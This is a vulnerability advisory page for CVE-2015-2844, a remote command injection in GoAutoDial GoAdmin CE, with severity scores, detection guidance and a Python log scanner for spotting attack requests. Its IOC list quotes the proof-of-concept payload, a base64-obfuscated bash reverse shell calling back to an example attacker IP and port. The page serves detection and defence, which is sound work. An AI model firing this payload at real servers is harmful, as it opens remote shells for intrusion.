CVE-2015-2844
Published 2015-05-12
Priority: P2 / 70 / critical
CVSS 2.0: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 12.72% (95.8th percentile)
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1420434000 allows remote attackers to execute arbitrary commands via the $action portion of the PATH_INFO.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goautodial | goadmin_ce | — | — |
| goautodial | goadmin_ce | — | — |
Detection & IOCs (extracted from sources)
- Command: || bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"
- Detect command injection attempts in the PATH_INFO of go_site.php targeting the cpanel function; look for shell metacharacters (e.g., '||', ';', '`') in the $action or $type URI segments under /index.php/go_site/cpanel/
- Alert on HTTP requests to /index.php/go_site/cpanel/ containing base64-encoded payloads or pipe/bash subshell patterns, as attackers use base64 encoding to bypass web server encoding filters
- Detect the underlying exec call pattern in go_site.php: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'") — monitor process execution of goautodialc.pl spawning unexpected child processes
- Flag outbound /dev/tcp reverse shell connections initiated by bash, particularly from web server processes (e.g., apache/php) to external IPs on non-standard ports such as 4444
- Any GoAutoDial version between 3.3-1406088000 and 3.3-1421902800 may be vulnerable, not just the specific build listed in the CVE, as intermediate releases contained no relevant code fixes
- The exploit PoC IP (192.168.0.11) and port (4444) are example attacker-controlled values from the PoC; real-world exploitation will use different callback addresses and ports
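The first two detection points above, written as access-log scanning logic. This is an added example, not part of the original page or any vendor rule; it assumes Apache-style access logs and that legitimate cpanel segments are bare service names and verbs, and the function names and sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: Apache-style access log with the request line in double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Everything after the cpanel route is PATH_INFO that reaches the exec() call.
CPANEL_TAIL = re.compile(r"/go_site/cpanel/(.*)", re.I | re.S)
# Assumption: legitimate segments are bare service names and verbs (httpd, restart).
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_.-]+")

def suspicious_segments(log_line):
    """Return URL-decoded cpanel path segments that fail the allowlist."""
    req = REQUEST.search(log_line)
    if not req:
        return []
    path = unquote(req.group(1).split("?", 1)[0])
    tail = CPANEL_TAIL.search(path)
    if not tail:
        return []
    return [s for s in tail.group(1).split("/") if s and not SAFE_SEGMENT.fullmatch(s)]

def scan(lines):
    """Return (line_number, offending_segments) for each flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        bad = suspicious_segments(line)
        if bad:
            hits.append((n, bad))
    return hits

# Constructed sample log lines (documentation IP ranges, harmless commands).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2015:10:00:01 +0000] "GET /index.php/go_site/cpanel/httpd/restart HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/May/2015:10:00:05 +0000] "GET /index.php/go_site/cpanel/%7C%7C%20echo%20test/start HTTP/1.1" 200 0',
    '203.0.113.9 - - [12/May/2015:10:00:09 +0000] "GET /index.php/go_site/cpanel/mysqld/status%60uname%60 HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/May/2015:10:00:12 +0000] "GET /index.php/go_login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for lineno, segs in scan(SAMPLE_LOG):
        print(f"line {lineno}: suspicious cpanel segment(s): {segs}")
```

An allowlist on decoded segments flags spaces, pipes, backticks and semicolons in one rule, so it does not depend on recognising a particular encoding of the payload.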
References
- http://goautodial.org/news/21
- http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.html
- http://www.securityfocus.com/archive/1/535319/100/1100/threaded
- http://www.securityfocus.com/bid/74281
- https://www.exploit-db.com/exploits/36807/